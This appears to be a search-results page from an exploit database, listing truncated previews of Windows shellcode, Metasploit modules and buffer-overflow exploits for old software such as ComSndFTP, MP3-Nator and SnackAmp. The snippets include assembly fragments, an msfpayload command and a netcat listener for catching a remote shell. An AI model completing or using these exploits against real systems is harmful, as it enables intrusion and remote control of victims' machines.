19 matches found
Windows/x64 - Bind Shell TCP Shellcode (508 bytes)
/ Title : Windows x64 Bind Shell TCP Shellcode size : 508 bytes Date : 08-12-2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x64 / / section .text global start start: xor rdx,rdx mov rax,gs:rdx+0x60 mov rsi,rax+0x18 mov rsi,rsi+0x10 lodsq mov rsi,rax mov r14,rsi+0x30...
Windows/x86 - Persistent Reverse Shell TCP (494 Bytes)
/ Title : Windows x86 persistent reverse shell tcp Author : Roziul Hasan Khan Shifat Date : 04-09-2016 Tested on : Windows 7 x86 / / Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent / / section .text global start start: xor ecx,ecx mov eax,fs:ecx+0x3...
Design/Logic Flaw
Multiple untrusted search path vulnerabilities in cURL and libcurl before 7.49.1, when built with SSPI or telnet is enabled, allow local users to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse 1 security.dll, 2 secur32.dll, or 3 ws232.dll in the application or current...
CVE-2016-4802
Multiple untrusted search path vulnerabilities in cURL and libcurl before 7.49.1, when built with SSPI or telnet is enabled, allow local users to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse 1 security.dll, 2 secur32.dll, or 3 ws232.dll in the application or current...
MP3-Nator-Buffer-Overflow
Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://files.brothersoft.com/mp3audio/players/mp3nator.zip filename = 'crash.plf' ./msfpayload windows/exec CMD=calc EXITFUNC=seh R |...
MS Windows WebDAV - (ntdll.dll) Remote Exploit
No description provided by source. // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 / / the...
ComSndFTP 1.3.7 Beta - USER Format String (Write4) Vulnerability
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit...
ComSndFTP v1.3.7 Beta USER Buffer Overflow
Exploit for windows platform in category remote exploits $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require...
ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'ComSndFTP v1.3.7 Beta USER Buffe...
ComSndFTP 1.3.7 Beta USER Format String (Write4)
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'ComSndFTP v1.3.7 Beta USER Buffe...
ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially crafted format string specifier as a username. The crafted username is sent to the server to overwrite the hardcoded function pointer from Ws232.dll!WSACleanup. Once this function pointer is triggered, the cod...
MP3-Nator Buffer Overflow (SEH - DEP BYPASS)
Exploit for windows platform in category local exploits ============================================ MP3-Nator Buffer Overflow SEH - DEP BYPASS ============================================ Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil...
MP3-Nator - Local Buffer Overflow (SEH) (DEP Bypass)
Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli - mind1355atgmaildotcom Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/d.php?softid=16524&url=http://files.brothersoft.com/mp3audio/players/mp3nator.zip...
SnackAmp 3.1.3B SMP Buffer Overflow
Exploit Title: SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability SEH - DEP BYPASS Date: 09/24/10 Author: Muhamad Fadzil Ramli - mind1355 AT gmail DOT com Credit/Bug Found By: james AT learnsecurityonline DOT com Software Link: http://sourceforge.net/projects/snackamp/ Version: 3.1.3 Bet...
SnackAmp 3.1.3B - SMP Buffer Overflow (SEH) (DEP Bypass)
Exploit Title: SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability SEH - DEP BYPASS Date: 09/24/10 Author: Muhamad Fadzil Ramli - mind1355 AT gmail DOT com Credit/Bug Found By: james AT learnsecurityonline DOT com Software Link: http://sourceforge.net/projects/snackamp/ Version: 3.1.3 Bet...
HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)
!/usr/bin/env python HTML Creator & Sender = v2.3 Build 697 Local Buffer Overflow Exploit SEH Coded By: DrIDE Based On: http://www.milw0rm.com/exploits/9446 Testd On: Windows XP SP2 Download: http://www.html-email.net/ Usage: Browse to file, enter anything for From and To, Send Email. import stru...
HTML Creator And Sender 2.3 Buffer Overflow
!/usr/bin/env python HTML Creator & Sender = v2.3 Build 697 Local Buffer Overflow Exploit SEH Coded By: DrIDE Based On: http://www.milw0rm.com/exploits/9446 Testd On: Windows XP SP2 Download: http://www.html-email.net/ Usage: Browse to file, enter anything for From and To, Send Email. import stru...
MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021
No description provided by source. EMRCOLORMATCHTOTARGETW stack buffer overflow exploit By Ac!dDrop This is one of the 2 Vulnerabilities of MS08-021 Tested on Windows xp professional SP1 GDi32.dll 5.1.2600.1106 kernel32.dll 5.1.2600.1106 ws232.dll 5.1.2600.0 calc.zip--- executes calculator IE.zip...
PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit
Exploit for unknown platform in category local exploits =================================================================== PHP = 4.4.0 mysqlconnect function Local Buffer Overflow Exploit =================================================================== ?php / This exploit was designed to work...